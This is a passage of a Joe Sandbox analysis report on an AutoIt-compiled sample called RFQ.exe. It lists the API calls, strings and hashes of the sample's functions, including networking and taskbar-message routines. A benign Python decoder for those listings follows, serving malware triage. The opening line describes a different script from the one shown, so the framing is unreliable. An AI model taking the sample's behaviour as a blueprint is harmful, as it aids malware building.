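Run the file directly to print each function's API ID hash, its readable API ID and its sorted API names; jaccard on the two sample records returns 0.0 because they import no API in common. The fuzzy hashes are kept as strings: comparing them needs the matching fuzzy-hash algorithm, which this section of the report does not name, so the parser does not attempt it.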
APIs
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
• WSAGetLastError.WSOCK32(00000000), ref: 0046D439
• _memmove.LIBCMT ref: 0046D475
• inet_ntoa.WSOCK32(?), ref: 0046D481
Memory Dump Source
• Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 2502553879-0
APIs
• SendMessageW.USER32 ref: 00448C69
• GetWindowLongW.USER32(?,000000EC), ref: 00448C91
• SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
• SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
• accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
• WSAGetLastError.WSOCK32(00000000), ref: 00458B03
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
• GetStockObject.GDI32(00000011), ref: 00430258
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
• ShowWindow.USER32(00000000,00000000), ref: 0043027D
Similarity
• API ID: Window$CreateMessageObjectSendShowStock
• String ID:
• API String ID: 1358664141-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00443CA6
• MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
• CloseHandle.KERNEL32(00000000), ref: 00443CF9
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
APIs
• GetWindowRect.USER32(?,?), ref: 00430BA2
• ScreenToClient.USER32(?,?), ref: 00430BC1
• ScreenToClient.USER32(?,?), ref: 00430BE2
• InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
APIs
• __wsplitpath.LIBCMT ref: 0043392E
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• __wsplitpath.LIBCMT ref: 00433950
• __wcsicoll.LIBCMT ref: 00433974
• __wcsicoll.LIBCMT ref: 0043398A
Similarity
• API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
• String ID:
• API String ID: 1187119602-0
APIs
Similarity
• API ID: _wcslen$_malloc_wcscat_wcscpy
• String ID:
• API String ID: 1597257046-0
APIs
• GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
• __malloc_crt.LIBCMT ref: 0041F5B6
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
Similarity
• API ID: EnvironmentStrings$Free__malloc_crt
• String ID:
• API String ID: 237123855-0
APIs
Similarity
• API ID: DeleteDestroyObject$IconWindow
• String ID:
• API String ID: 3349847261-0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
• InterlockedExchange.KERNEL32(?,?), ref: 0044B603
• LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
• LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
• LineTo.GDI32(?,?,?), ref: 00447326
• EndPath.GDI32(?), ref: 00447336
• StrokePath.GDI32(?), ref: 00447344
Similarity
• API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
• String ID:
• API String ID: 2783949968-0
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
• GetCurrentThreadId.KERNEL32 ref: 004364A3
• AttachThreadInput.USER32(00000000), ref: 004364AA
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
APIs
• GetDesktopWindow.USER32 ref: 00472B63
• GetDC.USER32(00000000), ref: 00472B6C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
• ReleaseDC.USER32(00000000,?), ref: 00472B99
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
• GetDesktopWindow.USER32 ref: 00472BB2
• GetDC.USER32(00000000), ref: 00472BBB
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• ReleaseDC.USER32(00000000,?), ref: 00472BE8
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
• __getptd_noexit.LIBCMT ref: 00415150
  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
• CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
• __freeptd.LIBCMT ref: 0041516B
• ExitThread.KERNEL32 ref: 00415173
Similarity
• API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
• String ID:
• API String ID: 1454798553-0
APIs
Strings
                                                                          Similarity
                                                                          • API ID: _strncmp
                                                                          • String ID: Q\E
                                                                          • API String ID: 909875538-2189900498
                                                                          APIs
                                                                          • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                          • String ID: AutoIt3GUI$Container
                                                                          • API String ID: 2652923123-3941886329
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _memmove_strncmp
                                                                          • String ID: U$\
                                                                          • API String ID: 2666721431-100911408
                                                                          APIs
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • __wcsnicmp.LIBCMT ref: 00467288
                                                                          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                          • String ID: LPT
                                                                          • API String ID: 3035604524-1350329615
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \$h
                                                                          • API String ID: 4104443479-677774858
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID: &
                                                                          • API String ID: 2931989736-1010288
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \
                                                                          • API String ID: 4104443479-2967466578
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00466825
                                                                          • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: CrackInternet_wcslen
                                                                          • String ID: |
                                                                          • API String ID: 596671847-2343686810
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: '
                                                                          • API String ID: 3850602802-1997036262
                                                                          APIs
                                                                          • _strlen.LIBCMT ref: 0040F858
                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                          • _sprintf.LIBCMT ref: 0040F9AE
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _memmove$_sprintf_strlen
                                                                          • String ID: %02X
                                                                          • API String ID: 1921645428-436463671
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Combobox
                                                                          • API String ID: 3850602802-2096851135
                                                                          APIs
                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: LengthMessageSendTextWindow
                                                                          • String ID: edit
                                                                          • API String ID: 2978978980-2167791130
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: GlobalMemorySleepStatus
                                                                          • String ID: @
                                                                          • API String ID: 2783356886-2766056989
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: htonsinet_addr
                                                                          • String ID: 255.255.255.255
                                                                          • API String ID: 3832099526-2422070025
                                                                          APIs
                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InternetOpen
                                                                          • String ID: <local>
                                                                          • API String ID: 2038078732-4266983199
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: __fread_nolock_memmove
                                                                          • String ID: EA06
                                                                          • API String ID: 1988441806-3962188686
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: u,D
                                                                          • API String ID: 4104443479-3858472334
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • wsprintfW.USER32 ref: 0045612A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: MessageSend_mallocwsprintf
                                                                          • String ID: %d/%02d/%02d
                                                                          • API String ID: 1262938277-328681919
                                                                          APIs
                                                                          • InternetCloseHandle.WININET(?), ref: 00442663
                                                                          • InternetCloseHandle.WININET ref: 00442668
                                                                            • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CloseHandleInternet$ObjectSingleWait
                                                                          • String ID: aeB
                                                                          • API String ID: 857135153-906807131
                                                                          APIs
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                          • PostMessageW.USER32(00000000), ref: 00441C05
                                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: FindMessagePostSleepWindow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 529655941-2988720461
                                                                          APIs
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: FindMessagePostSleepWindow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 529655941-2988720461
                                                                          • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                          • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                          • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                          • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                          APIs
                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                            • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Message_doexit
                                                                          • String ID: AutoIt$Error allocating memory.
                                                                          • API String ID: 1993061046-4017498283
                                                                          • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                          • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                          • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                          • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D
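Added example (editor's code, not part of the Joe Sandbox report and not code from the RFQ.exe sample): a small Python decoder for the "APIs" bullets in the two routines above, the FindWindowW/PostMessageW pair aimed at Shell_TrayWnd and the MessageBoxW that prints the AutoIt runtime's "Error allocating memory." string. It names the Win32 constants the listing shows only as hex (0x0111 is WM_COMMAND, 0x10 is MB_ICONHAND) and derives coarse triage tags, so an analyst can read these listings without a header lookup. The three input lines are constructed from the report's bullets; the constant tables are winuser.h values; the triage tags and the `ApiCall`/`parse_api_line`/`triage_tags` names are this example's own. The report does not document what WM_COMMAND id 0x197 (407) means to Shell_TrayWnd, and neither does this code.

```python
"""Decode Joe Sandbox "APIs" bullets (e.g. "PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D").

Sample input below is constructed from the report's bullets, not a verbatim export.
Constant tables are winuser.h values; triage tags are this example's own heuristic.
"""
import re
from dataclasses import dataclass, field

# Constructed from the two routines' "APIs" bullets in the report.
SAMPLE_LINES = """\
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
"""

# Window-message identifiers worth naming when they appear as the uMsg argument (winuser.h).
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x0111: "WM_COMMAND", 0x0112: "WM_SYSCOMMAND"}

# MessageBox uType icon and modifier bits (winuser.h). 0x10 is MB_ICONHAND (= MB_ICONERROR / MB_ICONSTOP).
MB_ICONS = {0x00: None, 0x10: "MB_ICONHAND", 0x20: "MB_ICONQUESTION",
            0x30: "MB_ICONEXCLAMATION", 0x40: "MB_ICONASTERISK"}
MB_MODIFIERS = {0x1000: "MB_SYSTEMMODAL", 0x10000: "MB_SETFOREGROUND", 0x40000: "MB_TOPMOST"}

# "<func>.<MODULE>(<args>), ref: <hex address>"; args are comma separated.
LINE_RE = re.compile(r"^(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")


@dataclass
class ApiCall:
    func: str
    module: str
    args: list          # int for 8-hex-digit values, str for literals and the "?" placeholder
    ref: int            # address of the call site inside the dumped image
    notes: list = field(default_factory=list)


def parse_arg(raw):
    """Joe Sandbox prints runtime-resolved values as 8 hex digits (00000000 = unknown/NULL), strings verbatim."""
    raw = raw.strip()
    if re.fullmatch(r"[0-9A-Fa-f]{8}", raw):   # an 8-char hex-looking string literal would be misread; acceptable for triage
        return int(raw, 16)
    return raw


def describe_messagebox(utype):
    """Render a MessageBox uType value as winuser.h flag names."""
    names = ["MB_OK"] if (utype & 0x0F) == 0 else [f"buttons=0x{utype & 0x0F:x}"]
    icon = MB_ICONS.get(utype & 0xF0)
    if icon:
        names.append(icon)
    names += [name for bit, name in MB_MODIFIERS.items() if utype & bit]
    return "|".join(names)


def parse_api_line(line):
    """Parse one "APIs" bullet; returns an ApiCall with decoded notes, or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = [parse_arg(a) for a in m.group("args").split(",")] if m.group("args") else []
    call = ApiCall(m.group("func"), m.group("module"), args, int(m.group("ref"), 16))
    if call.func.startswith(("PostMessage", "SendMessage")) and len(args) >= 4 and isinstance(args[1], int):
        msg = WINDOW_MESSAGES.get(args[1], f"WM_0x{args[1]:04x}")
        # The hwnd (args[0]) is 00000000 here because it is the runtime result of FindWindowW.
        call.notes.append(f"{msg} wParam=0x{args[2]:x} lParam=0x{args[3]:x}")
    elif call.func.startswith("MessageBox") and len(args) >= 4 and isinstance(args[3], int):
        call.notes.append(describe_messagebox(args[3]))
    return call


def parse_listing(text):
    """Parse every bullet in a listing, skipping lines that are not API calls."""
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c is not None]


def triage_tags(calls):
    """Heuristic tags (this example's own) from a routine's API sequence."""
    tags = set()
    finds_tray = any(c.func.startswith("FindWindow") and "Shell_TrayWnd" in c.args for c in calls)
    posts = any(c.func.startswith(("PostMessage", "SendMessage")) for c in calls)
    if finds_tray and posts:
        tags.add("shell-tray-message")   # messages the taskbar window; benign in the AutoIt runtime, still worth noting
    if any(c.func.startswith("MessageBox") and "AutoIt" in c.args for c in calls):
        tags.add("autoit-runtime")       # caption "AutoIt" + runtime error text: AutoIt-compiled executable
    return tags


if __name__ == "__main__":
    calls = parse_listing(SAMPLE_LINES)
    for c in calls:
        print(f"{c.ref:08X} {c.func}.{c.module} {c.args} {c.notes}")
    print(sorted(triage_tags(calls)))
```

Run it on the bullets as printed in the report (strip the leading "•"); each call keeps its `ref` address so the decoded line can be matched back to the disassembly at 00441C2A, 00441C3D and 004370D1.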